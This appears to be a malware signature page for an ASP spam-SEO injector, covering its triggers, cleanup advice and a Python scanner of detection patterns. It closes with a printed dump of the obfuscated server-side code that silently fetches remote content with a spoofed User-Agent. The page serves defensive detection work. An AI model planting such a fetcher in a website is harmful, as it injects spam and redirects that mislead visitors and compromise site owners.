Malware Signatures

asp.spam-seo.injector.001

Blackhat SEO, or spam-seo, is a malicious technique used to manipulate search engine results so that a website appears more relevant than it is. The payload is ASP based, so it is intended for server-side use and is executed directly on the server while the site is rendered. Only the payload's result (spam content, a redirect) is visible in the browser, not the malicious code itself.
Spam-seo can also be found inside the site's database, injected there by ASP malware or through other vulnerabilities such as SQL injection or a vulnerable CMS.
Spam injectors rely on external websites or other files that are included when certain conditions are met. The triggers can be User-Agents, IP address regions and referrer sites; once they are met, the script loads the malicious content.

Affecting

Any ASP based website, often through vulnerable code or compromised FTP credentials.

Cleanup

Look for strange file includes or MSXML2.serverXMLHTTP objects being created without your consent.
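
One way to run this check across a webroot, as an added example (not part of the signature and not any scanner's own code). The rule names, the include allow-list, the 8-character identifier threshold and the sample page are assumptions made for illustration; the patterns come from the description above and the Dump below.

```python
import re
from pathlib import Path

# Heuristics taken from this page's Cleanup note and Dump; the include
# allow-list and the 8-character threshold are assumptions to tune per site.
XMLHTTP = re.compile(r"CreateObject\s*\(\s*\"?\s*MSXML2\.ServerXMLHTTP", re.I)
INCLUDE = re.compile(r"<!--\s*#include\s+(?:file|virtual)\s*=\s*\"([^\"]+)\"", re.I)
O0_NAME = re.compile(r"\bO(?=[O0]*0)[O0]{7,}\b")
TRIGGER = re.compile(r"ServerVariables\s*\(\s*\"(?:HTTP_USER_AGENT|HTTP_REFERER|REMOTE_ADDR)\"", re.I)
EXPECTED_INCLUDE_EXT = {".asp", ".inc"}

def scan_text(text):
    """Return (line_number, rule, line) for every heuristic hit in ASP source."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if XMLHTTP.search(line):
            hits.append((no, "serverxmlhttp-object", line.strip()))
        for target in INCLUDE.findall(line):
            if Path(target.replace("\\", "/")).suffix.lower() not in EXPECTED_INCLUDE_EXT:
                hits.append((no, "unexpected-include", line.strip()))
        if O0_NAME.search(line):
            hits.append((no, "o0-obfuscated-name", line.strip()))
        if TRIGGER.search(line):
            hits.append((no, "visitor-trigger-lookup", line.strip()))
    return hits

def scan_tree(root, patterns=("*.asp", "*.asa", "*.inc")):
    """Scan classic-ASP files under root; returns {path: hits} for files with hits."""
    report = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample (made-up identifiers): one ordinary include, one odd one, Dump-like lines.
SAMPLE = '''<!-- #include file="header.asp" -->
<!-- #include virtual="/images/logo.jpg" -->
<%
On Error Resume Next
ua = Request.ServerVariables("HTTP_USER_AGENT")
Set O0O0OO00O0 = Server.CreateObject("MSXML2.ServerXMLHTTP")
O0O0OO00O0.Open "GET", OO00O0O0OO, False
%>'''

if __name__ == "__main__":
    for no, rule, line in scan_text(SAMPLE):
        print(f"{no:>3}  {rule:<24} {line}")
```

Each hit is a lead for manual review rather than a verdict: legitimate code also reads the User-Agent or creates HTTP objects, so compare flagged files against a known-good copy of the site.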

Dump

On Error Resume Next
    Set OO0O000O00OO0 = Server.CreateObject (MSXML2.serverXMLHTTP)
    OO0O000O00OO0.Open GET, O00OO000000O00 , False
    OO0O000O00OO0.setRequestHeader User-Agent, O00OO000000O00
    OO0O000O00OO0.send
    O0O000OO0O = OO0O000O00OO0.ResponseBody